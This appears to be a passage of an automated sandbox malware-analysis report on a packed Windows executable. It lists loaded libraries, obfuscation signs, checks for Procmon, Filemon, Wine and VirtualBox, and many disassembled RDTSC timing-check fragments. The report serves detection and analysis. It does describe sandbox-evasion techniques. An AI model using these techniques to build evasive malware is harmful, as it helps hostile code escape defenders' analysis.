Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1760768 > 1048576
Source: file.exe | Static PE information: Raw size of kerxdhhv is bigger than: 0x100000 < 0x193e00

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.620000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kerxdhhv:EW;dedzcksa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kerxdhhv:EW;dedzcksa:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00646390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1afc11 should be: 0x1b91a4
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: kerxdhhv
Source: file.exe | Static PE information: section name: dedzcksa
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A80AB | push 321B65EDh; mov dword ptr [esp], edx | 0_2_009A8124
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A80AB | push edi; mov dword ptr [esp], 54F3773Bh | 0_2_009A8192
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A80AB | push 7A88B857h; mov dword ptr [esp], ecx | 0_2_009A81A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A80AB | push ecx; mov dword ptr [esp], edx | 0_2_009A81AF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A80AB | push 46F3AAB2h; mov dword ptr [esp], esi | 0_2_009A81BF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A80AB | push ebp; mov dword ptr [esp], eax | 0_2_009A81CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A03094 | push 77C59282h; mov dword ptr [esp], edx | 0_2_00A030BC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A03094 | push eax; mov dword ptr [esp], edi | 0_2_00A030D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4689C | push esi; mov dword ptr [esp], edx | 0_2_00A468B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4689C | push 48D9D255h; mov dword ptr [esp], edx | 0_2_00A46948
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A058FF | push 5AE837D9h; mov dword ptr [esp], ebx | 0_2_00A0594E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A058FF | push 416C5849h; mov dword ptr [esp], ecx | 0_2_00A05969
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7D0C4 | push 28E29432h; mov dword ptr [esp], ebp | 0_2_00A7D158
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7D0C4 | push 25A942D8h; mov dword ptr [esp], edx | 0_2_00A7D1F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7D0C4 | push edi; mov dword ptr [esp], eax | 0_2_00A7D211
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5C0D8 | push edx; mov dword ptr [esp], 3E6BEDA6h | 0_2_00A5C0EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5B8DA | push ebx; mov dword ptr [esp], ecx | 0_2_00A5B903
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A5B8DA | push 0C17DCF2h; mov dword ptr [esp], esi | 0_2_00A5B95E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AAE036 | push 35A7D311h; mov dword ptr [esp], eax | 0_2_00AAE067
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F6038 | push 4ED7B707h; mov dword ptr [esp], ebp | 0_2_009F604D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD7004 | push esi; mov dword ptr [esp], edi | 0_2_00AD7026
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009FB076 | push ecx; mov dword ptr [esp], ebx | 0_2_009FB0B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00647895 | push ecx; ret | 0_2_006478A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4A852 | push esi; mov dword ptr [esp], eax | 0_2_00A4A8B1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push edi; mov dword ptr [esp], eax0_2_009D807C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push 64E36653h; mov dword ptr [esp], ecx0_2_009D80EE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push edx; mov dword ptr [esp], 00000004h0_2_009D811C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push edx; mov dword ptr [esp], ebp0_2_009D8134
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push 7F976B30h; mov dword ptr [esp], eax0_2_009D814F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push ebp; mov dword ptr [esp], edx0_2_009D823A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8067 push edi; mov dword ptr [esp], esi0_2_009D8252
              Source: file.exeStatic PE information: section name: kerxdhhv entropy: 7.952968465504712

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00646390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00646390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-25692
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8702D3 second address: 8702EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF7B0C9CD55h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 86FB60 second address: 86FB65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E0E99 second address: 9E0E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DFE0C second address: 9DFE39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCFh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF7B0F3BFD4h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DFE39 second address: 9DFE4C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007FF7B0C9CD46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DFE4C second address: 9DFE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DFFF4 second address: 9DFFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DFFF8 second address: 9E0004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jg 00007FF7B0F3BFC6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E01CD second address: 9E01DD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF7B0C9CD46h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E01DD second address: 9E01E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E033A second address: 9E0365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF7B0C9CD51h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FF7B0C9CD4Bh 0x00000011 jp 00007FF7B0C9CD4Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E37B1 second address: 9E37C4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007FF7B0F3BFC6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E37C4 second address: 9E381B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movsx ecx, bx 0x0000000c push 00000000h 0x0000000e jbe 00007FF7B0C9CD4Ch 0x00000014 pushad 0x00000015 mov dx, 638Bh 0x00000019 cld 0x0000001a popad 0x0000001b call 00007FF7B0C9CD49h 0x00000020 jmp 00007FF7B0C9CD59h 0x00000025 push eax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF7B0C9CD50h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E381B second address: 9E381F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E381F second address: 9E383F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FF7B0C9CD48h 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push edx 0x00000013 jp 00007FF7B0C9CD46h 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E383F second address: 9E3843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E3843 second address: 9E385B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF7B0C9CD4Dh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E3929 second address: 9E39B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FF7B0F3BFCDh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 jmp 00007FF7B0F3BFD8h 0x00000018 jmp 00007FF7B0F3BFD2h 0x0000001d popad 0x0000001e pop eax 0x0000001f jmp 00007FF7B0F3BFCFh 0x00000024 lea ebx, dword ptr [ebp+124476B5h] 0x0000002a je 00007FF7B0F3BFC6h 0x00000030 xchg eax, ebx 0x00000031 pushad 0x00000032 jmp 00007FF7B0F3BFD7h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FF7B0F3BFCBh 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E3D12 second address: 9E3D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F62CD second address: 9F62E7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF7B0F3BFCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FF7B0F3BFC6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A01771 second address: A01775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0191A second address: A0191E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A01A50 second address: A01A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A01A56 second address: A01A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A01B9C second address: A01BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A01BA0 second address: A01BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FF7B0F3BFD1h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF7B0F3BFCCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A01BCD second address: A01BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A01BD1 second address: A01BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A023CF second address: A023FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 js 00007FF7B0C9CD46h 0x0000000b jp 00007FF7B0C9CD46h 0x00000011 jc 00007FF7B0C9CD46h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FF7B0C9CD4Fh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A023FA second address: A023FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02526 second address: A0252B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0252B second address: A0253D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF7B0F3BFCDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A026CF second address: A026DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FAFD2 second address: 9FAFD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CFE8D second address: 9CFE96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CFE96 second address: 9CFE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A02ED0 second address: A02EDC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF7B0C9CD4Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0302F second address: A0304E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF7B0F3BFD3h 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A03416 second address: A0344C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0C9CD4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FF7B0C9CD61h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF7B0C9CD59h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0344C second address: A03466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD6h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A03466 second address: A03482 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF7B0C9CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FF7B0C9CD4Ah 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A03482 second address: A0349B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7B0F3BFD3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0349B second address: A034A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A034A0 second address: A034AA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF7B0F3BFCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A07D3F second address: A07D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7B0C9CD59h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A07EAD second address: A07EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A065E6 second address: A065EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A065EC second address: A065F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A07FB6 second address: A07FC0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF7B0C9CD4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A080E7 second address: A080F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FF7B0F3BFC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6A98 second address: 9D6A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6A9D second address: 9D6AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFCBh 0x00000007 ja 00007FF7B0F3BFD2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007FF7B0F3BFD2h 0x0000001a popad 0x0000001b jo 00007FF7B0F3BFD5h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 jmp 00007FF7B0F3BFCDh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D6AF2 second address: 9D6AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4F41 second address: 9D4F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 jne 00007FF7B0F3BFC8h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4F50 second address: 9D4F5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF7B0C9CD46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D4F5B second address: 9D4F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF7B0F3BFCFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FF7B0F3BFC6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0EE37 second address: A0EE59 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF7B0C9CD56h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F25E second address: A0F282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7B0F3BFD2h 0x00000007 jc 00007FF7B0F3BFC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007FF7B0F3BFC8h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F593 second address: A0F59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF7B0C9CD46h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F59E second address: A0F5B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FF7B0F3BFCCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F5B9 second address: A0F5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11619 second address: A116BA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF7B0F3BFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007FF7B0F3BFE4h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push esi 0x00000017 push edi 0x00000018 je 00007FF7B0F3BFC6h 0x0000001e pop edi 0x0000001f pop esi 0x00000020 mov eax, dword ptr [eax] 0x00000022 jnp 00007FF7B0F3BFCEh 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 pop eax 0x00000034 pop eax 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FF7B0F3BFC8h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000015h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f cld 0x00000050 call 00007FF7B0F3BFC9h 0x00000055 ja 00007FF7B0F3BFD5h 0x0000005b push eax 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jns 00007FF7B0F3BFC6h 0x00000065 rdtsc
